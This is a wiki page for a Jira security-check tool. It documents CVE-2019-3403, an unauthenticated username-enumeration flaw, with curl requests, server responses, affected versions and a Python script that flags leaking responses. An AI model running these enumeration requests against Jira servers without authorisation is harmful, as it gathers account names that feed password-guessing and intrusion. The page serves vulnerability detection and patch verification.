# CVE-2019-3403 - carnal0wnage/J-PWN GitHub Wiki
- Category: [Info Disclosure]
- Module name: `check_cve_2019_3403`
- URL: `/rest/api/2/user/picker?query=admin`
```
+ [Info Disclosure] CVE-2019-3403 Detected
URL: http://JIRASERVER/rest/api/2/user/picker?query=admin
Total Users Found: 1
Header: Showing 1 of 1 matching users
User Details: [{'name': 'admin', 'key': 'admin', 'html': '<strong>admin</strong> (<strong>admin</strong>)', 'displayName': 'admin'}]
```
Because the unauthenticated response differs for existing and non-existing accounts, this endpoint can be used to brute-force (enumerate) usernames. A query for an existing user returns the matching account:

```shell
curl -k -v 'http://JIRASERVER/rest/api/2/user/picker?query=admin'
```

```json
{"users":[{"name":"admin","key":"admin","html":"<strong>admin</strong> (<strong>admin</strong>)","displayName":"admin"}],"total":1,"header":"Showing 1 of 1 matching users"}
```
A query for a user that does not exist returns an empty list:

```shell
curl -k -v 'http://JIRASERVER/rest/api/2/user/picker?query=admin2'
```

```json
{"users":[],"total":0,"header":"Showing 0 of 0 matching users"}
```
## Description

The `/rest/api/2/user/picker` REST resource in Jira

- before version 7.13.3,
- from version 8.0.0 before version 8.0.4, and
- from version 8.1.0 before version 8.1.1

allows remote attackers to enumerate usernames via an incorrect authorization check.
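As an added example (not code from the J-PWN module or this wiki), the Python below implements the two decisions behind this check: whether a Jira version string falls inside the affected ranges listed in the description, and whether an unauthenticated picker response exposes usernames. The two JSON bodies are the ones shown above, embedded as constructed input; `AFFECTED_RANGES`, `is_affected_version` and `check_unauthenticated_response` are names chosen here, not the module's.

```python
import json
from typing import List, Tuple

# Affected ranges from the description above, as [min_inclusive, max_exclusive)
AFFECTED_RANGES = [
    ((0, 0, 0), (7, 13, 3)),   # every release before 7.13.3
    ((8, 0, 0), (8, 0, 4)),    # 8.0.0 up to, but not including, 8.0.4
    ((8, 1, 0), (8, 1, 1)),    # 8.1.0 up to, but not including, 8.1.1
]


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '7.13.3' into (7, 13, 3); a short string like '8.1' becomes (8, 1, 0)."""
    parts = [int(p) for p in version.strip().split(".")[:3]]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_affected_version(version: str) -> bool:
    """True if the Jira version is inside a range fixed by the CVE-2019-3403 patches."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def leaked_usernames(body: str) -> List[str]:
    """Return the 'name' of every account in a /rest/api/2/user/picker JSON body."""
    return [u["name"] for u in json.loads(body).get("users", [])]


def check_unauthenticated_response(body: str) -> dict:
    """Decide like the check module: a non-empty user list returned to an
    unauthenticated request shows the authorization check is missing."""
    data = json.loads(body)
    names = leaked_usernames(body)
    return {
        "vulnerable": data.get("total", 0) > 0 and len(names) > 0,
        "total": data.get("total", 0),
        "users": names,
        "header": data.get("header", ""),
    }


# Constructed sample input: the two response bodies from the curl runs above
HIT = '{"users":[{"name":"admin","key":"admin","html":"<strong>admin</strong> (<strong>admin</strong>)","displayName":"admin"}],"total":1,"header":"Showing 1 of 1 matching users"}'
MISS = '{"users":[],"total":0,"header":"Showing 0 of 0 matching users"}'

if __name__ == "__main__":
    for ver in ("7.13.2", "7.13.3", "8.0.3", "8.0.4", "8.1.0", "8.1.1", "8.2.0"):
        print(ver, "affected" if is_affected_version(ver) else "patched")
    print(check_unauthenticated_response(HIT))
    print(check_unauthenticated_response(MISS))
```

Running it against a live instance means sending the request without credentials and feeding the body to `check_unauthenticated_response`; a patched server should not return a populated user list to an anonymous caller.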